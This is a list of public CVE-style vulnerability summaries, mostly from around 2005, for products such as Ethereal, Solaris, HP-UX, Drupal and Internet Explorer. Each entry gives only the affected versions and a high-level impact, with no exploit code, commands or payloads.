Unknown vulnerability in loginwindow in Mac OS X 10.4.2 and earlier, when Fast User Switching is enabled, allows attackers to log into other accounts if they know the passwords to at least two accounts.
Unknown vulnerability in Sun McData switches and directors 4300, 4500, 6064, and 6140 before E/OS 6.0.0 may allow attackers to cause a denial of service (connectivity and array access loss) via a network broadcast storm.
Cross-site scripting (XSS) vulnerability in the Helpdesk in Logicampus before 1.1.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Buffer overflow in a "core application plug-in" for Adobe Reader 5.1 through 7.0.2 and Acrobat 5.0 through 7.0.2 allows attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors.
Unknown vulnerability in 3Com OfficeConnect Wireless 11g Access Point before 1.03.12 allows remote attackers to obtain sensitive information via the web interface.
Unknown vulnerability in the BER dissector in Ethereal 0.10.11 allows remote attackers to cause a denial of service (abort or infinite loop) via unknown attack vectors.
Unknown vulnerability in the SMB dissector in Ethereal 0.9.0 through 0.10.11 allows remote attackers to cause a buffer overflow or a denial of service (memory consumption) via unknown attack vectors.
Unknown vulnerability in the (1) GIOP dissector, (2) WBXML, or (3) CAMEL dissector in Ethereal 0.8.20 through 0.10.11 allows remote attackers to cause a denial of service (application crash) via certain packets that cause a null pointer dereference.
Unknown vulnerability in the (1) SMPP dissector, (2) 802.3 dissector, (3) DHCP, (4) MEGACO dissector, or (5) H1 dissector in Ethereal 0.8.15 through 0.10.11 allows remote attackers to cause a denial of service (infinite loop) via unknown attack vectors.
Unknown vulnerability several dissectors in Ethereal 0.9.0 through 0.10.11 allows remote attackers to cause a denial of service (application crash) by reassembling certain packets.
Unknown vulnerability in the (1) AgentX dissector, (2) PER dissector, (3) DOCSIS dissector, (4) SCTP graphs, (5) HTTP dissector, (6) DCERPC, (7) DHCP, (8) RADIUS dissector, (9) Telnet dissector, (10) IS-IS LSP dissector, or (11) NCP dissector in Ethereal 0.8.19 through 0.10.11 allows remote attackers to cause a denial of service (application crash or abort) via unknown attack vectors.
Unknown vulnerability in the LDAP dissector in Ethereal 0.8.5 through 0.10.11 allows remote attackers to cause a denial of service (free static memory and application crash) via unknown attack vectors.
Check Point SecuRemote NG with Application Intelligence R54 allows attackers to obtain credentials and gain privileges via unknown attack vectors.
Multiple SQL injection vulnerabilities in WebEOC before 6.0.2 allow remote attackers to modify SQL statements via unknown attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in WebEOC before 6.0.2 allow remote attackers to inject arbitrary web script and HTML via unknown vectors.
Multiple unknown vulnerabilities in Jinzora 2.0.1 have unknown impact and attack vectors, possibly involving a PHP file inclusion vulnerability.
Multiple unknown vulnerabilities in Moodle before 1.5.1 have unknown impact and attack vectors.
Unknown vulnerability in F5 BIG-IP 9.0.2 through 9.1 allows attackers to "subvert the authentication of SSL transactions," via unknown attack vectors, possibly involving NATIVE ciphers.
Unknown vulnerability in the SMTP service in MailEnable Standard before 1.9 and Professional before 1.6 allows remote attackers to cause a denial of service (crash) during authentication.
Unknown vulnerability in the HTTPMail service in MailEnable Professional before 1.6 has unknown impact and attack vectors.
Cross-site scripting (XSS) vulnerability in the MicroServer Web Server for Xerox WorkCentre Pro Color 2128, 2636, and 3545, version 0.001.04.044 through 0.001.04.504, allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unknown vulnerability in the MicroServer Web Server for Xerox WorkCentre Pro Color 2128, 2636, and 3545, version 0.001.04.044 through 0.001.04.504, allow attackers to cause a denial of service or access files via crafted HTTP requests.
Multiple unknown vulnerabilities in the MicroServer Web Server for Xerox WorkCentre Pro Color 2128, 2636, and 3545, version 0.001.04.044 through 0.001.04.504, allow attackers to bypass authentication.
SQL injection vulnerability in Covide Groupware-CRM allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
Unknown vulnerability in NateOn Messenger 3.0 allows remote attackers to list arbitrary directories via unknown attack vectors.
Unknown vulnerability in Drupal 4.5.0 through 4.5.3, 4.6.0, and 4.6.1 allows remote attackers to execute arbitrary PHP code via a public comment or posting.
Unknown vulnerability in Remote Agent for Windows Servers (RAWS) in VERITAS Backup Exec 9.0 through 10.0 for Windows, and 9.0.4019 through 9.1.307 for NetWare, allows remote attackers to gain privileges by copying the handle for the server.
Unknown vulnerability in IBM DB2 8.1.4 through 8.1.9 and 8.2.0 through 8.2.2 allows local users with SELECT privileges to conduct unauthorized activities and insert, update or delete table contents.
SQL injection vulnerability in article.asp in unknown versions of aspnuke allows remote attackers to execute arbitrary SQL commands via the articleid parameter.
Unknown vulnerability in RealPlayer 10 and 10.5 (6.0.12.1040-1069) and RealOne Player v1 and v2 allows remote attackers to overwrite arbitrary files or execute arbitrary ActiveX controls via a crafted MP3 file.
Unknown vulnerability in Tor before 0.1.0.10 allows remote attackers to read arbitrary memory and possibly key information from the exit server's process space.
Unknown vulnerability in "various plugins" for NanoBlogger 3.2.1 and earlier allows remote attackers to execute arbitrary commands.
Unknown vulnerability in lpadmin on Sun Solaris 7, 8, and 9 allows local users to overwrite arbitrary files.
Unknown vulnerability in Webmail in iPlanet Messaging Server 5.2 Patch 1 and Sun ONE Messaging Server 6.2 allows remote attackers to execute arbitrary Javascript, possibly due to a cross-site scripting (XSS) vulnerability.
Unknown vulnerability in Internet Explorer 5.0, 5.5, and 6.0 allows remote attackers to obtain information and possibly execute code when browsing from a web site to a web folder view using WebDAV, aka "Web Folder Behaviors Cross-Domain Vulnerability".
Unknown vulnerability in Internet Explorer 5.0, 5.5, and 6.0 allows remote attackers to execute arbitrary code via a web site or an HTML e-mail containing a crafted JPEG image that causes memory corruption, aka "JPEG Image Rendering Memory Corruption Vulnerability".
Unknown vulnerability in the PKINIT Protocol for Microsoft Windows 2000, Windows XP, and Windows Server 2003 could allow a local user to obtain information and spoof a server via a man-in-the-middle (MITM) attack between a client and a domain controller when PKINIT smart card authentication is being used.
Unknown vulnerability in Microsoft Windows 2000 Server and Windows Server 2003 domain controllers allows remote authenticated users to cause a denial of service (system crash) via a crafted Kerberos message.
Unknown vulnerability in ObjectWeb Consortium C-JDBC before 1.3.1 allows local users to bypass intended access restrictions and obtain the cache results from another user.
Unknown vulnerability in the web server for the ESS/ Network Controller for Xerox Document Centre 240 through 555 running System Software 27.18.017 and earlier allows attackers to "gain unauthorized access."
Unknown vulnerability in FlexCast Audio Video Streaming Server before 2.0 has unknown impact and attack vectors.
FlatNuke 2.5.3 allows remote attackers to cause a denial of service or obtain sensitive information via (1) a direct request to foot_news.php, which triggers an infinite loop, or (2) direct requests to unknown scripts, which reveals the web document root in an error message.
Unknown vulnerability in Mortiforo before 0.9.1 allows users to access private forums via unknown attack vectors.
Unknown vulnerability in Sun ONE Application Server 6.5 SP1 Maintenance Update 6 and earlier allows attackers to read files.
Unknown vulnerability in the Sun Solaris C library (libc and libproject) in Solaris 10 allows local users to gain privileges.
Cross-site scripting (XSS) vulnerability in view.php in YaPiG 0.92b, 0.93u and 0.94u allows remote attackers to inject arbitrary web script or HTML via (1) the phid parameter or (2) unknown parameters when posting a new comment.
Unknown vulnerability in the privilege system in Drupal 4.4.0 through 4.6.0, when public registration is enabled, allows remote attackers to gain privileges, due to an "input check" that "is not implemented properly."
Unknown vulnerability in arshell in the Array Service (arrayd) for SGI ProPack 3 with SP 5 and 6, and SGI ProPack 4, allows local users to execute arbitrary shells as root on other hosts in the cluster or array.
Unknown vulnerability in apt-cacher in Debian 3.1, related to "missing input sanitising," allows remote attackers to execute arbitrary commands on the caching server.
A certain contributed script for ekg Gadu Gadu client 1.5 and earlier allows attackers to execute shell commands via unknown attack vectors.
Certain contributed scripts for ekg Gadu Gadu client 1.5 and earlier create temporary files insecurely, with unknown impact and attack vectors, a different vulnerability than CVE-2005-1916.
The dhcpcd DHCP client before 1.3.22 allows remote attackers to cause a denial of service (daemon crash) via unknown vectors that cause an out-of-bounds memory read.
Cross-site scripting (XSS) vulnerability in NikoSoft WebMail before 0.11.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple SQL injection vulnerabilities in NewLife Blogger before 3.3.1 allow remote attackers to execute arbitrary SQL commands via unknown attack vectors.
SQL injection vulnerability in login.asp in an unknown product by Online Solutions for Educators (OS4E) allows remote attackers to execute arbitrary SQL commands via the password.
Cross-site scripting (XSS) vulnerability in FreeStyle Wiki 3.5.7 and WikiLite (FSWikiLite) .10 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unknown vulnerability in SMTP authentication for MailEnable allows remote attackers to cause a denial of service (crash).
Multiple unknown vulnerabilities in L-Soft LISTSERV 14.3, 1.8e, and 1.8d allow remote attackers to execute arbitrary code or cause a denial of service.  NOTE: this candidate may be SPLIT in the future when more precise technical details become available.
Unknown vulnerability in HP-UX trusted systems B.11.00 through B.11.23 allows remote attackers to gain unauthorized access, possibly involving remshd and/or telnet -t.
Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.0 through 1.4.4 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in (1) the URL or (2) an e-mail message.
Multiple cross-site scripting (XSS) vulnerabilities in BEA WebLogic Server and Express 8.1 through Service Pack 4, and 7.0 through Service Pack 6, allow remote attackers to inject arbitrary web script or HTML, and possibly gain administrative privileges, via the (1) j_username or (2) j_password parameters in the login page (LoginForm.jsp), (3) parameters to the error page in the Administration Console, (4) unknown vectors in the Server Console while the administrator has an active session to obtain the ADMINCONSOLESESSION cookie, or (5) an alternate vector in the Server Console that does not require an active session but also leaks the username and password.
Multiple unknown vulnerabilities in PROMS 0.11 allow "non-authorized users" to (1) view or modify the project member list or (2) modify the todos list.
Multiple cross-site scripting (XSS) vulnerabilities in PROMS before 0.11 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple SQL injection vulnerabilities in PROMS before 0.11 allow remote attackers to execute arbitrary SQL commands via unknown vectors.
Unknown vulnerability in the CoreGraphics Window Server for Mac OS X 10.4.x up to 10.4.1 allows local users to inject arbitrary commands into root sessions.
Unknown vulnerability in ALWIL avast! antivirus 4 (4.6.6230) and earlier, when running on Windows NT 4.0, does not properly detect certain viruses.
Cross-site scripting (XSS) vulnerability in NetWin SurgeMail 3.0c2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unknown vulnerability in Serendipity 0.8, when used with multiple authors, allows unprivileged authors to upload arbitrary media files.
Unknown vulnerability in Blue Coat Reporter before 7.1.2 allows remote unauthenticated attackers to add a license.
Unknown vulnerability in MailScanner 4.41.3 and earlier, related to "incomplete reporting of viruses in zip files," allows remote attackers to bypass virus detection.
Unknown vulnerability in Groove Virtual Office before 3.1 build 2338, before 3.1a build 2364, and Groove Workspace before 2.5n build 1871 allows remote attackers to bypass restrictions on COM objects.
Unknown vulnerability in Extreme BlackDiamond 10808 and 8800 switches running ExtremeWare XOS 11.1 before 11.1.3.3, 11.0 before 11.0.2.4, and 10.x allows remote authenticated users to execute arbitrary commands.
Unknown vulnerability in Attachment Mod before 2.3.13, related to a "serious issue with realnames," has unknown impact and attack vectors.
Unknown vulnerability in Viewglob before 2.0.1, related to "a potential security issue with the Viewglob display and ssh X forwarding," has unknown impact.
Unknown vulnerability in Sun StorEdge 6130 Arrays (SE6130) with serial numbers between 0451AWF00G and 0513AWF00J allows local users and remote attackers to delete data.
Multiple unknown vulnerabilities in the Blocks module in Spidean AutoTheme 1.7 and AT-Lite for PostNuke have unknown impact.
Unknown vulnerability in NIS+ on Solaris 7, 8, and 9 allows remote attackers to cause a denial of service (rpc.nisd disabled and NIS+ unavailable) via unknown vectors.
Unknown vulnerability in Solaris 7 through 9, when using Federated Naming Services (FNS), autofs, and FNS X.500 configuration, allows local users to cause a denial of service (automountd crash) when "accessing" /xfn/_x500.
Unknown vulnerability in Cisco Firewall Services Module (FWSM) 2.3.1 and earlier, when using URL, FTP, or HTTPS filtering exceptions, allows certain TCP packets to bypass access control lists (ACLs).
Unknown vulnerability in Merak Mail Server 8.0.3 with Icewarp Web Mail 5.4.2 allows remote authenticated users to obtain the full path of the server via certain requests to (1) calendar_addevent.html, (2) calendar_event.html, or (3) calendar_task.html.
Multiple unknown vulnerabilities in the (1) TZSP, (2) MGCP, (3) ISUP, (4) SMB, or (5) Bittorrent dissectors in Ethereal before 0.10.11 allow remote attackers to cause a denial of service (segmentation fault) via unknown vectors.
Unknown vulnerability in the GSM dissector in Ethereal before 0.10.11 allows remote attackers to cause the dissector to access an invalid pointer.
Multiple unknown vulnerabilities in the (1) WSP, (2) Q.931, (3) H.245, (4) KINK, (5) MGCP, (6) RPC, (7) SMBMailslot, and (8) SMB NETLOGON dissectors in Ethereal before 0.10.11 allow remote attackers to cause a denial of service (crash) via unknown vectors that lead to a null dereference.
Unknown vulnerability in the NDPS dissector in Ethereal before 0.10.11 allows remote attackers to cause a denial of service (memory exhaustion) via unknown vectors.
Unknown vulnerability in the DICOM dissector in Ethereal before 0.10.11 allows remote attackers to cause a denial of service (large memory allocation) via unknown vectors.
Unknown vulnerability in the NCP dissector in Ethereal before 0.10.11 allow remote attackers to cause a denial of service (long loop).
Multiple unknown vulnerabilities in the (1) KINK, (2) L2TP, (3) MGCP, (4) EIGRP, (5) DLSw, (6) MEGACO, (7) LMP, and (8) RSVP dissectors in Ethereal before 0.10.11 allow remote attackers to cause a denial of service (infinite loop).
Multiple unknown dissectors in Ethereal before 0.10.11 allow remote attackers to cause a denial of service (assert error) via an invalid protocol tree item length.
Multiple unknown vulnerabilities in the (1) WSP, (2) BER, (3) SMB, (4) NDPS, (5) IAX2, (6) RADIUS, (7) TCAP, (8) MRDISC, (9) 802.3 Slow, (10) SMBMailslot, or (11) SMB PIPE dissectors in Ethereal before 0.10.11 allow remote attackers to cause a denial of service (assert error).
Multiple unknown "other problems" in the KINK dissector in Ethereal before 0.10.11 have unknown impact and attack vectors.
Multiple unknown vulnerabilities in the (1) AIM, (2) LDAP, (3) FibreChannel, (4) GSM_MAP, (5) SRVLOC, and (6) NTLMSSP dissectors in Ethereal before 0.10.11 allow remote attackers to cause a denial of service (crash).
Multiple unknown vulnerabilities in the (1) DHCP and (2) Telnet dissectors in Ethereal before 0.10.11 allow remote attackers to cause a denial of service (abort).
Unknown vulnerability in "the function used to validate path-names for uploading media" in Serendipity before 0.8 has unknown impact.
Unknown vulnerability in serendipity_config_local.inc.php for Serendipity before 0.8 has unknown impact.
Cross-site scripting (XSS) vulnerability in the BBCode plugin for Serendipity before 0.8 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple unknown vulnerabilities in OpenView Network Node Manager (OV NNM) 6.2, 6.4, 7.01, and 7.50 allow attackers to cause a denial of service or execute arbitrary code.
Multiple unknown vulnjerabilities HP OpenView Event Correlation Services (OV ECS) 3.32 and 3.33 allow attackers to cause a denial of service or execute arbitrary code.
PostgreSQL 7.3.x through 8.0.x gives public EXECUTE access to certain character conversion functions, which allows unprivileged users to call those functions with malicious values, with unknown impact, aka the "Character conversion vulnerability."
SQL injection vulnerability in search.php for PHP-Calendar before 0.10.3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Cross-site scripting (XSS) vulnerability in SURVIVOR before 0.9.6 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple PHP remote file inclusion vulnerabilities in Claroline 1.5.3 through 1.6 Release Candidate 1, and possibly Dokeos, allow remote attackers to execute arbitrary PHP code via unknown vectors.
Unknown vulnerability in Radia Management Agent (RMA) in HP OpenView Radia Management Portal (RMP) 1.x and 2.x allows remote attackers to execute arbitrary commands via unknown vectors.
** UNVERIFIABLE **
Unknown vulnerability in Mac OS X 10.3.9 allows local users to gain privileges via (1) chfn, (2) chpass, and (3) chsh, which "use external helper programs in an insecure manner."
PHP remote file inclusion vulnerability in Yappa-NG before 2.3.2 allows remote attackers to execute arbitrary PHP code via unknown vectors.
Cross-site scripting (XSS) vulnerability in Yappa-NG before 2.3.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Cross-site scripting (XSS) vulnerability in MediaWiki before 1.4.2, when using HTML Tidy ($wgUseTidy), allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Buffer overflow in Sun Java System Web Proxy Server (aka Sun ONE Proxy Server) 3.6 SP6 allows remote attackers to execute arbitrary code via unknown vectors.
Buffer overflow in the Server Message Block (SMB) functionality for Microsoft Windows 2000, XP SP1 and SP2, and Server 2003 and SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka the "Server Message Block Vulnerability."
Unknown vulnerability in HP-UX B.11.00, B.11.04, B.11.11, B.11.22, and B.11.23, when running TCP/IP on IPv4, allows remote attackers to cause a denial of service via certain packets, related to the PMTU, a different vulnerability than CVE-2004-1060.
Unknown vulnerability in Incoming Remote Command (iSeries Access for Windows Remote Command service) in IBM OS/400 R510, R520, and R530 allows attackers to cause a denial of service (IRC shutdown) via certain inputs.
Unknown vulnerability in Xerox MicroServer Web Server for various WorkCentre products including M35/M45/M55 2.028.11.000 through 2.97.20.032 and 4.84.16.000 through 4.97.20.032, Pro 35/45/55 3.028.11.000 through 3.97.20.032, Pro 65/75/90 1.001.00.060 through 1.001.02.084, and others, related to SNMP authentication, allows remote attackers to modify system configuration, a different vulnerability than CVE-2005-0703.
Unknown vulnerability in (1) Webmin and (2) Usermin before 1.200 causes Webmin to change permissions and ownership of configuration files, with unknown impact.
Unknown vulnerability in Sun Java System Web Server 6.0 SP7 and earlier, when running on Windows systems, allows attackers to cause a denial of service (hang).
Unknown vulnerability in WebMail in Kerio MailServer before 6.0.9 allows remote attackers to cause a denial of service (CPU consumption) via certain e-mail messages.
Unknown vulnerability in Veritas i3 Focalpoint Server 7.1 and earlier has unknown attack vectors and unknown but "critical" impact.
Unknown vulnerability in the libgss Generic Security Services Library in Solaris 7, 8, and 9 allows local users to gain privileges by loading their own GSS-API.
Unknown vulnerability in DC++ before 0.674 allows attackers to append data to arbitrary files.
Unknown vulnerability in DameWare NT Utilities 4.8 and earlier, and Mini Remote Control 4.8 and earlier, allows local users to gain additional rights.
Unknown vulnerability in sCssBoard 1.11 and earlier has unknown impact, related to "an exploit on the Profile page."
Unknown vulnerability in the TCP/IP functionality (TCPIP.NLM) in Novell Netware 6.x allows remote attackers to cause a denial of service (ABEND by Page Fault Processor Exception) via certain packets.
Unknown vulnerability in HP OpenView Network Node Manager (NMM) 6.2 through 6.4, and 7.01 through 7.50, allows remote attackers to cause a denial of service.
Multiple unknown vulnerabilities in netapplet in Novell Linux Desktop 9 allow local users to gain root privileges, related to "User input [being] passed to network scripts without verification."
Unknown vulnerability in AIX 5.3.0, when configured as an NIS client, allows remote attackers to gain root privileges.
Multiple buffer overflows in Pavuk before 0.9.32 have unknown attack vectors and impact.
Unknown vulnerability in the LIST functionality in CommuniGate Pro before 4.3c3 allows remote attackers to cause a denial of service (server crash) via certain multipart messages.
A vulnerability classified as critical has been found in mikexstudios Xcomic up to 0.8.2. This affects an unknown part. The manipulation of the argument cmd leads to os command injection. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 0.8.3 is able to address this issue. The patch is named 6ed8e3cc336e29f09c7e791863d0559939da98bf. It is recommended to upgrade the affected component.
RC.BOOT in IBM AIX 5.1, 5.2, and 5.3 does not "use a secure location for temporary files," which allows local users to have an unknown impact, probably by overwriting files.
Unknown vulnerability in IRC Services NickServ LISTLINKS before 5.0.50 allows remote attackers to obtain the links of a nick.
Unknown vulnerability in the nfs_mount call in Mac OS X 10.3.9 and earlier allows local users to gain privileges via crafted arguments.
Unknown vulnerability in the setsockopt system call in Mac OS X 10.3.9 and earlier allows local users to cause a denial of service (memory exhaustion) via crafted arguments.
The IRC protocol plugin in Gaim 1.2.0, and possibly earlier versions, allows (1) remote attackers to inject arbitrary Gaim markup via irc_msg_kick, irc_msg_mode, irc_msg_part, irc_msg_quit, (2) remote attackers to inject arbitrary Pango markup and pop up empty dialog boxes via irc_msg_invite, or (3) malicious IRC servers to cause a denial of service (application crash) by injecting certain Pango markup into irc_msg_badmode, irc_msg_banned, irc_msg_unknown, irc_msg_nochan functions.
Unknown vulnerability in Kerio Personal Firewall 4.1.2 and earlier allows local users to bypass firewall rules via a malicious process that impersonates a legitimate process that has fewer restrictions.
Unknown vulnerability in Microsoft Jet DB engine (msjet40.dll) 4.00.8618.0, related to insufficient data validation, allows remote attackers to execute arbitrary code via a crafted mdb file.
Multiple cross-site scripting (XSS) vulnerabilities in WackoWiki R4 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unknown vulnerability in subs.pl for WebAPP 0.9.9 through 0.9.9.2 has unknown impact and attack vectors, probably involving shell metacharacters or .. sequences.
Unknown vulnerability in the Auto-Protect module in Symantec Norton AntiVirus 2004 and 2005, as also used in Internet Security 2004/2005 and System Works 2004/2005, allows attackers to cause a denial of service (system hang or crash) by triggering a scan of a certain file type.
Multiple SQL injection vulnerabilities in Bugtracker.NET 2.0.1 allow remote attackers to execute arbitrary SQL commands via unknown vectors.
Unknown vulnerability in the regex_replace modifier (modifier.regex_replace.php) in Smarty before 2.6.8 allows attackers to execute arbitrary PHP code.
Unknown vulnerabilities in deplate before 0.7.2 have unknown impact, possibly involving elements.rb.
The SNMP service in the Belkin 54G (F5D7130) wireless router allows remote attackers to cause a denial of service via unknown vectors.
Cross-site scripting (XSS) vulnerability in PHP-Post before 0.33 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple buffer overflows in Xzabite DYNDNSUpdate 0.6.15 and earlier, including the ipcheck function in dyndnsupdate.c, allow remote attackers who spoof a dyndns.org server to execute arbitrary code via unknown vectors.
Unknown vulnerability in Citrix MetaFrame Conferencing Manager 3.0 allows conference members to bypass organizer restrictions to control the keyboard and mouse.
Unknown vulnerability in the DNSd proxy, as used in Symantec Gateway Security 5400 2.x and 5300 1.x, Enterprise Firewall 7.0.x and 8.x, and VelociRaptor 1100/1200/1300 1.5, allows remote attackers to poison the DNS cache and redirect users to malicious sites.
Unknown vulnerability in lshd in Lysator LSH 1.x and 2.x before 2.0.1 allows remote attackers to cause a denial of service via unknown vectors.
Buffer overflow in Initial Redirect (ir) Squid Proxy Plug-In 0.1 and 0.2 may allow attackers to cause a denial of service and execute arbitrary code via unknown vectors.
Multiple buffer overflows in OpenSLP before 1.1.5 allow remote attackers to have an unknown impact via malformed SLP packets.
Unknown vulnerability in the sFlow dissector in Ethereal 0.9.14 through 0.10.9 allows remote attackers to cause a denial of service (application crash).
Unknown vulnerability in the JXTA dissector in Ethereal 0.10.9 allows remote attackers to cause a denial of service (application crash).
Unknown vulnerability in ImageMagick before 6.1.8 allows remote attackers to cause a denial of service (application crash) via a crafted PSD file.
Cross-site scripting (XSS) vulnerability in Sun Java System Application Server 7 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unknown vulnerability in the systems message queue in HP Tru64 Unix 4.0F PK8 through 5.1B-2/PK4 allows local users to cause a denial of service (process crash) for processes such as nfsstat, pfstat, arp, ogated, rarpd, route, sendmail, srconfig, strsetup, trpt, netstat, and xntpd.
Unknown vulnerability in HTTP Anti Virus Proxy (HAVP) before 0.51 prevents viruses from being properly detected in certain files such as (1) .CAB or (2) .ZIP files.
Unknown vulnerability in PaX from the September 2003 release to 2.2 before 2005.03.05, related to SEGMEXEC or RANDEXEC and VMA mirroring, allows local users and possibly remote attackers to bypass intended access restrictions and execute arbitrary code.
Unknown vulnerability in HP OpenVMS VAX 7.x and 6.x and OpenVMS Alpha 7.x or 6.x allows local users to access privileged files.
Unknown vulnerability in FCKeditor 2.0 RC2, when used with PHP-Nuke, allows remote attackers to upload arbitrary files.
Unknown vulnerability in Standard Type Services Framework (STSF) Font Server Daemon (stfontserverd) in Solaris 9 allows local users to modify or delete arbitrary files.
Unknown vulnerability in ftpd on HP-UX B.11.00, B.11.04, B.11.11, B.11.22, and B.11.23 allows remote authenticated users to gain "unauthorized access to files."
Unknown vulnerability in IBM Hardware Management Console (HMC) before 4.4 for POWER5 servers allows local users to gain privileges, related to the Guided Setup Wizard.
Unknown vulnerability in Squiggle for Batik before 1.5.1 allows attackers to bypass certain access controls via certain features of the Rhino scripting engine due to a "script security issue."
Unknown vulnerability in Information Resource Manager (IRM) before 1.5.2.1 allows remote attackers to have "potentially serious" impact, related to LDAP logins.
The /proc handling (proc/base.c) Linux kernel 2.4 before 2.4.17 allows local users to cause a denial of service via unknown vectors that cause an invalid access of free memory.
Unknown "major security flaws" in Ulog-php before 1.0, related to input validation, have unknown impact and attack vectors, probably related to SQL injection vulnerabilities in (1) host.php, (2) port.php, and (3) index.php.
Unknown vulnerability in NewsBruiser 2.x before 2.6.1 allows remote attackers to "take actions on comments."
Unknown vulnerability in Solaris 8 and 9 allows remote attackers to cause a denial of service (panic) via "Heavy UDP Usage" that triggers a NULL dereference.
Unknown vulnerability in IBM Websphere Application Server 5.0, 5.1, and 6.0 when running on Windows, allows remote attackers to obtain the source code for Java Server Pages (.jsp) via a crafted URL that causes the page to be processed by the file serving servlet instead of the JSP engine.
Unknown vulnerability in the delete.asp program in certain versions of ASPjar Guestbook allows remote attackers to delete messages.  NOTE: there is insufficient information to know if this is the same issue as CVE-2002-1730.
Unknown "high risk" vulnerability in DB2 Universal Database 8.1 and earlier has unknown impact and attack vectors.  NOTE: due to the delayed disclosure of details for this issue, this candidate may be SPLIT in the future.  In addition, this may be a duplicate of other issues as reported by the vendor.
init_dev in tty_io.c in the Red Hat backport of NPTL to Red Hat Enterprise Linux 3 does not properly clear controlling tty's in multi-threaded applications, which allows local users to cause a denial of service (crash) and possibly gain tty access via unknown attack vectors that trigger an access of a pointer to a freed structure.
The helper scripts for crip 3.5 do not properly use temporary files, which allows local users to have an unknown impact with unknown attack vectors.
Unknown vulnerability in the remoteping service in remstats 1.0.13 and earlier allows remote attackers to execute arbitrary commands "due to missing input sanitising."
Unknown vulnerability in the PPP driver for the Linux kernel 2.6.8.1 allows remote attackers to cause a denial of service (kernel crash) via a pppd client.
Unknown vulnerability in BIND 9.2.0 in HP-UX B.11.00, B.11.11, and B.11.23 allows remote attackers to cause a denial of service.
Linksys PSUS4 running firmware 6032 allows remote attackers to cause a denial of service (device crash) via an HTTP POST request containing an unknown parameter without a value.
Unknown vulnerability in HP-UX B.11.04 running Virtualvault 4.5 through 4.7, when running the TGA daemon, allows remote attackers to cause a denial of service via certain network traffic.
Unknown vulnerability in Linux kernel 2.4.x, 2.5.x, and 2.6.x allows NFS clients to cause a denial of service via O_DIRECT.
Unknown vulnerability in the installation of Adobe License Management Service, as used in Adobe Photoshop CS, Adobe Creative Suite 1.0, and Adobe Premiere Pro 1.5, allows attackers to gain administrator privileges.
Unknown vulnerability in rpc.mountd in SGI IRIX 6.5.25, 6.5.26, and 6.5.27 does not sufficiently restrict access rights for read-mostly exports, which allows attackers to conduct unauthorized activities.
Unknown vulnerability in typespeed 0.4.1 and earlier allows local users to gain privileges.
Unknown vulnerability in the Red Hat Enterprise Linux 4 kernel 4GB/4GB split patch, when running on x86 with the hugemem kernel, allows local users to cause a denial of service (crash).
Unknown vulnerability in the Red Hat Enterprise Linux 4 kernel 4GB/4GB split patch, when using the hugemem kernel, allows local users to read and write to arbitrary kernel memory and gain privileges via certain syscalls.
Unknown vulnerability in hztty 2.0 and earlier allows local users to execute arbitrary commands.
Unknown vulnerability in the MMSE dissector in Ethereal 0.10.4 through 0.10.8 allows remote attackers to cause a denial of service by triggering a free of statically allocated memory.
Unknown vulnerability in the Gnutella dissector in Ethereal 0.10.6 through 0.10.8 allows remote attackers to cause a denial of service (application crash).
Unknown vulnerability in the DNP dissector in Ethereal 0.10.5 through 0.10.8 allows remote attackers to cause "memory corruption."
Unknown vulnerability in the DLSw dissector in Ethereal 0.10.6 through 0.10.8 allows remote attackers to cause a denial of service (application crash from assertion).
Unspecified vulnerability in SharedX in HP-UX B.11.00, B.11.11, and B.11.22 allows local users to access unspecified files or cause a denial of service via unknown vectors related to handling of "files in a potentially insecure manner."
Directory traversal vulnerability in browser.php in JBrowser 1.0 through 2.1 allows remote attackers to read arbitrary files via the directory parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Tincan Limited PHPlist before 2.8.12 has unknown impact and attack vectors, related to a "security update release."
The setup routine (setup.php) in PHProjekt 4.2.1 and earlier allows remote attackers to modify system configuration via unknown attack vectors.
Unspecified vulnerability in Window Maker 0.80.2 and earlier allows attackers to perform unknown actions via format string specifiers in a font specification in WMGLOBAL, probably a format string vulnerability.
Buffer overflow in the strip_html_tags method for Gyach Enhanced (Gyach-E) before 1.0.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via unknown vectors involving HTML tags.
Multiple unspecified vulnerabilities in Gyach Enhanced (Gyach-E) before 1.0.5 have unknown impact and attack vectors related to "several security flaws," probably related to buffer overflows in HTTP server responses.
Unspecified vulnerability in 3Com SuperStack 3 4400 switches with firmware version before 3.31 allows remote attackers to cause a denial of service (device reset) via a crafted request to the web management interface.  NOTE: the provenance of this information is unknown; details are obtained from third party reports.
Unspecified vulnerability in HP Tru64 UNIX 5.1B PK2(BL22) and PK3(BL24), and 5.1A PK6(BL24), when using IPsec/IKE (Internet Key Exchange) with Certificates, allows remote attackers to gain privileges via unknown attack vectors.
Unspecified vulnerability in ArGoSoft FTP server before 1.4.2.2 allows attackers to upload .lnk files via unknown vectors.
SQL injection vulnerability in Interchange before 4.8.9 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Cross-site scripting (XSS) vulnerability in Lotus Domino 6.0.x before 6.0.4 and 6.5.x before 6.5.2 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Unspecified vulnerability in PD9 Software MegaBBS 2.0 and 2.1 allows attackers to gain privileges via unknown vectors involving (1) admin/userlevelmembers-edit.asp and (2) admin/edit-groups.asp.
